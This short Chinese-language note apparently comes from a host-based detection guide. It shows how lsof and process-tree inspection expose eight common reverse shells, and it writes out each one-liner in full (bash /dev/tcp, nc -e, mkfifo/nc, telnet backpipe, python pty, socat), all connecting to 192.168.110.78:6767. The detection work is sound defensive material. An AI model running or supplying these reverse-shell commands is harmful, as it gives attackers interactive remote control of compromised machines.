1、bash -i >& /dev/tcp/192.168.110.78/6767 0>&1
可以看到bash -i的输入输出和错误输出全部定位到了一个socket上
我们lsof看一下bash进程
我们可以看到bash远程指向一个ip,那我们完全可以判定这是一个反弹shell。
2、nc -e /usr/bin/bash 192.168.110.78 6767
这里我们看到bash的输入输出都定位到了管道上,而这个管道指向父进程nc,而且这两个进程都连接了一个socket
这两个socket都是指向其他机器,所以我们也可以断定为一个反弹shell
3、mknod backpipe p && telnet 192.168.110.78 666 0<backpipe | /usr/bin/bash 1>backpipe
我们可以看到,bash的输入是管道,输出是个文件,而talent的输入是个文件,输出是管道,形成了一个闭环,并且有socket行为,所以我们可以断定它为反弹shell。
mknod backpipe p; nc 192.168.110.78 6767 0<backpipe | /usr/bin/bash 1>backpipe 2>backpipe 是类似的
4、rm /tmp/f;mkfifo /tmp/f; cat /tmp/f|/bin/sh -I 2>&1|nc 192.168.110.78 6767 >/tmp/f
这里我们发现bash下有三个子进程,但是仔细看,这三也是成环的,而且nc中有socket连接,所以也判定为反弹shell
5、/usr/bin/tcsh -i >& /dev/tcp/192.168.110.78/6767 0>&1
这里很多socket连接,bash下就很不正常,罪名成立
6、bash -c 'sh -I &>/dev/tcp/192.168.110.78/6767 0>&1'
bash子进程看起来啥也没干,但子进程的子进程在搞事情,杀之!
7、python -c 'import pty;pty.spawn("bash")' >/dev/tcp/192.168.110.78/6767 <&1 2>&1
我们可以看到bash虽然没有什么可疑操作,但是他的父进程python存在外连,那也不能惯着,杀!
8、socat TCP4:192.168.110.78:6767 EXEC:bash,pty,stderr,setsid,sigint,sane
我们发现bash和socat都有很多奇怪的外联,杀掉
特殊、msf上线
因为查杀msf会大大提高误报率,所以msf这里不要查